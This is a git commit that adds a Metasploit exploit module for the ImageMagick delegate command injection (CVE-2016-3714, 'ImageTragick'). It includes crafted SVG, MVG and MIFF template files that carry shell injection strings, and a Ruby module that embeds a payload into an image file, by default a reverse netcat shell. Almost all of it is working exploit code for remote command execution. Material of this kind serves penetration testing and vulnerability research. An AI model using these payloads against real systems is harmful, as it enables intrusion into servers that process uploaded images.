Land #6848, ImageMagick Exploit

lands wvu's imagemaick exploit
2024-11-05 14:57:30 +01:00 · 2016-05-06 10:54:38 -05:00 · 2016-05-06 10:54:38 -05:00 · 3f4d0479aa
commit 3f4d0479aa
parent 891a788ad4 2bac46097f
4 changed files with 114 additions and 0 deletions
--- a/data/exploits/CVE-2016-3714/msf.miff
+++ b/data/exploits/CVE-2016-3714/msf.miff
@ -0,0 +1,14 @@
+id=ImageMagick  version=1.0
+class=DirectClass  colors=0  matte=False
+columns=1  rows=1  depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33  green-primary=0.3,0.6  blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";echo vulnerable"}
+
+:ÿÿÿÿÿÿ
--- a/data/exploits/CVE-2016-3714/msf.mvg
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@ -0,0 +1,8 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 'https://localhost";echo vulnerable"'
+pop graphic-context
+pop graphic-context
--- a/data/exploits/CVE-2016-3714/msf.svg
+++ b/data/exploits/CVE-2016-3714/msf.svg
@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve">  <image id="image0" width="1" height="1" x="0" y="0"
+    xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable&#x22;" />
+</svg>
--- a/modules/exploits/unix/fileformat/imagemagick_delegate.rb
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
+      'Description'     => %q{
+        This module exploits a shell command injection in the way "delegates"
+        (commands for converting files) are processed in ImageMagick versions
+        <= 7.0.1-0 and <= 6.9.3-9 (legacy).
+
+        Since ImageMagick uses file magic to detect file format, you can create
+        a .png (for example) which is actually a crafted SVG (for example) that
+        triggers the command injection.
+
+        Tested on Linux, BSD, and OS X. You'll want to choose your payload
+        carefully due to portability concerns. Use cmd/unix/generic if need be.
+      },
+      'Author'          => [
+        'stewie',            # Vulnerability discovery
+        'Nikolay Ermishkin', # Vulnerability discovery
+        'wvu',               # Metasploit module
+        'hdm'                # Metasploit module
+      ],
+      'References'      => [
+        %w{CVE 2016-3714},
+        %w{URL https://imagetragick.com/},
+        %w{URL http://seclists.org/oss-sec/2016/q2/205},
+        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
+        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
+      ],
+      'DisclosureDate'  => 'May 3 2016',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => false,
+      'Payload'         => {
+        'BadChars'      => "\x22\x27\x5c", # ", ', and \
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat bash-tcp'
+        }
+      },
+      'Targets'         => [
+        ['SVG file',  template: 'msf.svg'], # convert msf.png msf.svg
+        ['MVG file',  template: 'msf.mvg'], # convert msf.svg msf.mvg
+        ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
+      ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions'  => {
+        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
+        'LHOST'                 => Rex::Socket.source_address,
+        'DisablePayloadHandler' => false,
+        'WfsDelay'              => 9001
+      }
+    ))
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
+    ])
+  end
+
+  def exploit
+    if target.name == 'SVG file'
+      p = Rex::Text.html_encode(payload.encoded)
+    else
+      p = payload.encoded
+    end
+
+    file_create(template.sub('echo vulnerable', p))
+  end
+
+  def template
+    File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
+    ))
+  end
+
+end